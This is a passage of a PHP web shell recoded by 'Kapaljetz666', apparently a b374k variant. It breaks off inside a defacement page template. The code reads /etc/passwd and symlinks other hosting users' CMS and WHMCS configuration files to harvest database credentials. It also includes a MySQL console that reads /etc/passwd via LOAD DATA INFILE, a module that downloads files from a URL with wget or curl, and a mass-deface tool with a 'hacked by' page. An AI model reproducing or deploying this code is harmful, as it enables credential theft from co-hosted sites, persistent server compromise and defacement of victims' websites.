2150@mkdir('pee',0777);
2151@symlink("/","pee/root");
2152$htaccss = "Options all
2153 DirectoryIndex Sux.html
2154 AddType text/plain .php
2155 AddHandler server-parsed .php
2156 AddType text/plain .html
2157 AddHandler txt .html
2158 Require None
2159 Satisfy Any";
2160
2161file_put_contents("pee/.htaccess",$htaccss);
2162$etc = file_get_contents("/etc/passwd");
2163$etcz = explode("\n",$etc);
2164
2165
2166##Symlink to the ROOT :p
2167foreach($etcz as $etz){
2168$etcc = explode(":",$etz);
2169error_reporting(0);
2170
2171$current_dir = posix_getcwd();
2172$dir = explode("/",$current_dir);
2173
2174symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2175symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2176symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2177symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2178symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
2179symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
2180symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2181symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2182symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2183symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2184symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
2185symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
2186symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
2187symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
2188symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
2189symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
2190symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
2191symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2192symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2193symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2194symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2195symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2196symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2197symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2198symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2199symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2200symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2201symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2202symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2203symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2204}
2205#############################
2206 if(is_readable("/var/named")){
2207 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2208 echo'<tr><td><center><b>SITE</b></center></td><td>
2209 <center><b>USER</b></center></td>
2210 <td></center><b>SYMLINK</b></center></td>';
2211 $list = scandir("/var/named");
2212 foreach($list as $domain){
2213 if(strpos($domain,".db")){
2214 $i += 1;
2215 $domain = str_replace('.db','',$domain);
2216 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2217
2218 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2219 <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
2220 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2221 }
2222 }
2223 echo "<center>Total Domains Found: ".$i."</center><br />";
2224 }else{
2225 echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
2226
2227break;
2228
2229##################################
2230error_reporting(0);
2231$etc = file_get_contents("/etc/passwd");
2232$etcz = explode("\n",$etc);
2233if(is_readable("/etc/passwd")){
2234
2235echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2236echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
2237
2238$list = scandir("/var/named");
2239
2240foreach($etcz as $etz){
2241$etcc = explode(":",$etz);
2242
2243foreach($list as $domain){
2244if(strpos($domain,".db")){
2245$domain = str_replace('.db','',$domain);
2246$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2247if($owner['name'] == $etcc[0])
2248{
2249$i += 1;
2250echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
2251<td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2252<td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2253}}}}
2254echo "<center>Total Domains Found: ".$i."</center><br />";}
2255
2256break;
2257###############################
2258if(is_readable("/etc/named.conf")){
2259echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2260echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2261$named = file_get_contents("/etc/named.conf");
2262preg_match_all('%zone \"(.*)\" {%',$named,$domains);
2263foreach($domains[1] as $domain){
2264$domain = trim($domain);
2265$i += 1;
2266$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2267echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2268}
2269echo "<center>Total Domains Found: ".$i."</center><br />";
2270
2271} else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
2272
2273break;
2274############################
2275if(is_readable("/etc/valiases")){
2276echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2277echo'<tr><td><center><b>SITE</b></center></td><td>
2278<center><b>USER</b></center></td><td></center>
2279<b>SYMLINK</b></center></td>';
2280$list = scandir("/etc/valiases");
2281foreach($list as $domain){
2282$i += 1;
2283$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2284echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2285<center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2286<td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2287}
2288echo "<center>Total Domains Found: ".$i."</center><br />";
2289} else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
2290
2291break;
2292}}
2293##########################
2294#JembutLoyality
2295##########################################
2296#######################
2297########################
2298# JAAAAAAAAAAAAANCCCCCCCCCCCOOOOOOOOOOOOOK
2299##################
2300# recode by Kapaljetz666
2301#########################
2302#gue kasih skat biar ga pusing :v
2303##################################
2304//////////////////
2305########################################################################
2306########################################################################
2307#########################################################################
2308# END
2309############## MYSQL ########################################
2310elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
2311{
2312$sqlhost = $_GET['sqlhost'];
2313$sqluser = $_GET['sqluser'];
2314$sqlpass = $_GET['sqlpass'];
2315$sqlport = $_GET['sqlport'];
2316if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
2317{
2318$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";
2319$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";
2320if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";
2321if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";
2322$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
2323$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";
2324$tables = array();
2325$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
2326while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
2327foreach($tables as $table){
2328$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
2329elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
2330$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
2331list($total) = mysql_fetch_row($hasil);
2332if(isset($_GET['z'])) $page = (int) $_GET['z'];
2333else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
2334while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
2335$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
2336for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
2337if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
2338elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
2339$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
2340if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
2341for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
2342if($rows[$j] == "") $dataz = " ";
2343else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
2344else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
2345else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
2346while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
2347$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
2348@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
2349<br><center><div class="mybox"><h2 class="k2ll33d2">MySQL Connect !<br>if you want use mysql interface by S4MP4H, change url '&x=mysq' to '&x=sql'</h2>
2350<form action="?" method="get"><input type="hidden" name="y" value="<?php echo $pwd;?>" />
2351<input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;"> <tr>
2352<th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td>
2353<input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
2354<tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
2355<tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
2356<tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" />
2357</td></tr></table></form></div></center>
2358<?
2359 }
2360 }
2361########################################################################
2362# START UPLOAD #
2363elseif(isset($_REQUEST['upload'])){ $s_result = " "; $msg = "";
2364if(isset($_POST['uploadcomp'])){
2365 if(is_uploaded_file($_FILES['file']['tmp_name'])){
2366 $path = magicboom($_POST['path']);
2367 $fname = $_FILES['file']['name'];
2368 $tmp_name = $_FILES['file']['tmp_name'];
2369 $pindah = $path.$fname;
2370 $stat = @move_uploaded_file($tmp_name,$pindah);
2371 if ($stat) {
2372 $msg = "file uploaded to $pindah";
2373 }
2374 else $msg = "failed to upload $fname";
2375 }
2376 else $msg = "failed to upload $fname";
2377}
2378elseif(isset($_POST['uploadurl'])){
2379 $pilihan = trim($_POST['pilihan']);
2380 $wurl = trim($_POST['wurl']);
2381 $path = magicboom($_POST['path']);
2382 $namafile = download($pilihan,$wurl);
2383 $pindah = $path.$namafile;
2384 if(is_file($pindah)) {
2385 $msg = "file uploaded to $pindah";
2386 }
2387 else $msg = "failed to upload $namafile";
2388
2389}
2390?>
2391<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
2392<table class="tabnet" style="width:320px;padding:0 1px;">
2393<tr><th colspan="2">Upload from computer</th></tr>
2394<tr><td colspan="2"><p style="text-align:center;"><input style="color:#FFFF00;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
2395<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2396</tr>
2397</table></form>
2398<table class="tabnet" style="width:320px;padding:0 1px;">
2399<tr><th colspan="2">Upload from url</th></tr>
2400<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
2401<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
2402<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2403<tr><td><select size="1" class="inputz" name="pilihan">
2404<option value="wwget">wget</option>
2405<option value="wlynx">lynx</option>
2406<option value="wfread">fread</option>
2407<option value="wfetch">fetch</option>
2408<option value="wlinks">links</option>
2409<option value="wget">GET</option>
2410<option value="wcurl">curl</option>
2411</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
2412</tr>
2413</table>
2414<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
2415<?php }
2416/////////////////////// END
2417/////////////////////// START HASH
2418elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
2419 {
2420 ?>
2421 <?php
2422$submit= $_POST['enter'];
2423if (isset($submit)) {
2424$pass = $_POST['password']; // password
2425$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
2426$hash = md5($pass); // md5 hash #1
2427$md4 = hash("md4",$pass);
2428$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
2429$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
2430$hash1 = sha1($pass); // sha1 hash #4
2431$sha256 = hash("sha256",$text);
2432$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
2433$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
2434}
2435echo '<form action="" method="post"><table class="tabnet">';
2436echo '<th colspan="2">Password Hash</th></center></tr>';
2437echo '<td><b>masukan kata yang ingin di encrypt:</b></td>';
2438echo '<td><input class="inputz" type="text" name="password" size="40" />';
2439echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
2440//echo '</td></tr><br>';
2441echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
2442echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr>';
2443echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr>';
2444echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr>';
2445echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr>';
2446echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr>';
2447echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr>';
2448echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr>';
2449echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr>';
2450echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr></table>';
2451}
2452
2453///////////// END OF HASH
2454########################################################################
2455######################################################
2456////START HASH ID
2457elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
2458if(isset($_POST['gethash'])){
2459 $hash = $_POST['hash'];
2460 if(strlen($hash)==32){
2461 $hashresult = "MD5 Hash";
2462 }elseif(strlen($hash)==40){
2463 $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
2464 }elseif(strlen($hash)==13){
2465 $hashresult = "DES(Unix) Hash";
2466 }elseif(strlen($hash)==16){
2467 $hashresult = "MySQL Hash / /DES(Oracle Hash)";
2468 }elseif(strlen($hash)==41){
2469 $GetHashChar = substr($hash, 40);
2470 if($GetHashChar == "*"){
2471 $hashresult = "MySQL5 Hash";
2472 }
2473 }elseif(strlen($hash)==64){
2474 $hashresult = "SHA-256 Hash";
2475 }elseif(strlen($hash)==96){
2476 $hashresult = "SHA-384 Hash";
2477 }elseif(strlen($hash)==128){
2478 $hashresult = "SHA-512 Hash";
2479 }elseif(strlen($hash)==34){
2480 if(strstr($hash, '$1$')){
2481 $hashresult = "MD5(Unix) Hash";
2482 }
2483 }elseif(strlen($hash)==37){
2484 if(strstr($hash, '$apr1$')){
2485 $hashresult = "MD5(APR) Hash";
2486 }
2487 }elseif(strlen($hash)==34){
2488 if(strstr($hash, '$H$')){
2489 $hashresult = "MD5(phpBB3) Hash";
2490 }
2491 }elseif(strlen($hash)==34){
2492 if(strstr($hash, '$P$')){
2493 $hashresult = "MD5(Wordpress) Hash";
2494 }
2495 }elseif(strlen($hash)==39){
2496 if(strstr($hash, '$5$')){
2497 $hashresult = "SHA-256(Unix) Hash";
2498 }
2499 }elseif(strlen($hash)==39){
2500 if(strstr($hash, '$6$')){
2501 $hashresult = "SHA-512(Unix) Hash";
2502 }
2503 }elseif(strlen($hash)==24){
2504 if(strstr($hash, '==')){
2505 $hashresult = "MD5(Base-64) Hash";
2506 }
2507 }else{
2508 $hashresult = "Hash type not found";
2509 }
2510 }else{
2511 $hashresult = "Not Hash Entered";
2512 }
2513
2514 ?>
2515 <center><br><Br><br>
2516
2517 <form action="" method="POST">
2518 <tr>
2519 <table class="tabnet">
2520 <th colspan="5">Hash Identification</th>
2521 <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
2522 <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
2523 </table></tr></form>
2524 </center>
2525
2526 <?php
2527
2528}
2529//////////////////// MASS DEFACE START HERE
2530elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2531{
2532echo "<center/><br/><b><font color=white>Mass Deface (recode by Kapaljetz666)</font></b><br>";
2533error_reporting(0);?>
2534<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2535<br>
2536<br>
2537note: if not domain in deface result, that mean this site not work mass deface (permission denied)<br><td><table><table class="tabnet" >
2538<form hethot='post'>
2539<tr>
2540 <tr>
2541 <td> Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
2542 </tr><br>
2543 <tr>
2544 <td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="del.htm"></td>
2545 </tr>
2546</tr>
2547<th colspan='2'><b>Script Deface</b></th><br></table>
2548<textarea style='background:black;outline:none;color:white;' name='index' rows='10' cols='67'>
2549<html>
2550<head>
2551<title>hacked by Kapaljetz666</title>
2552<link rel='SHORTCUT ICON' type='image/x-icon' href='http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif'>
2553<meta name="robots" content="index, follow">
2554<meta name="Description" content="hacked by Kapaljetz666">
2555<meta name="keyword" content="hacked by Kapaljetz666">
2556<meta name="googlebot" content="index,follow" />
2557<meta name="robots" content="all" />
2558<meta name="robots schedule" content="auto" />
2559<meta name="distribution" content="global" />
2560<body onload="type_text()" alink="#FFFF00" vlink="#FFFF00" link="#FFFF00" text="#FFFF00">
2561<table height=90% width=100%>
2562<script type="text/javascript">
2563
2564var snowmax=75
2565var snowcolor=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF")
2566var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
2567var snowletter="*"
2568var sinkspeed=0.6
2569var snowmaxsize=22
2570var snowminsize=8
2571var snowingzone=1
2572
2573// Do not edit below this line
2574var snow=new Array()
2575var marginbottom
2576var marginright
2577var timer
2578var i_snow=0
2579var x_mv=new Array();
2580var crds=new Array();
2581var lftrght=new Array();
2582var browserinfos=navigator.userAgent
2583var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
2584var ns6=document.getElementById&&!document.all
2585var opera=browserinfos.match(/Opera/)
2586var browserok=ie5||ns6||opera
2587
2588function randommaker(range) {
2589 rand=Math.floor(range*Math.random())
2590 return rand
2591}
2592
2593function initsnow() {
2594 if (ie5 || opera) {
2595 marginbottom = document.body.clientHeight
2596 marginright = document.body.clientWidth
2597 }
2598 else if (ns6) {
2599 marginbottom = window.innerHeight
2600 marginright = window.innerWidth
2601 }
2602 var snowsizerange=snowmaxsize-snowminsize
2603 for (i=0;i<=snowmax;i++) {
2604 crds[i] = 0;
2605 lftrght[i] = Math.random()*15;
2606 x_mv[i] = 0.03 + Math.random()/10;
2607 snow[i]=document.getElementById("s"+i)
2608 snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
2609 snow[i].size=randommaker(snowsizerange)+snowminsize
2610 snow[i].style.fontSize=snow[i].size
2611 snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
2612 snow[i].sink=sinkspeed*snow[i].size/5
2613 if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
2614 if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
2615 if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
2616 if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
2617 snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
2618 snow[i].style.left=snow[i].posx
2619 snow[i].style.top=snow[i].posy
2620 }
2621 movesnow()
2622}
2623
2624function movesnow() {
2625 for (i=0;i<=snowmax;i++) {
2626 crds[i] += x_mv[i];
2627 snow[i].posy+=snow[i].sink
2628 snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
2629 snow[i].style.top=snow[i].posy
2630
2631 if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
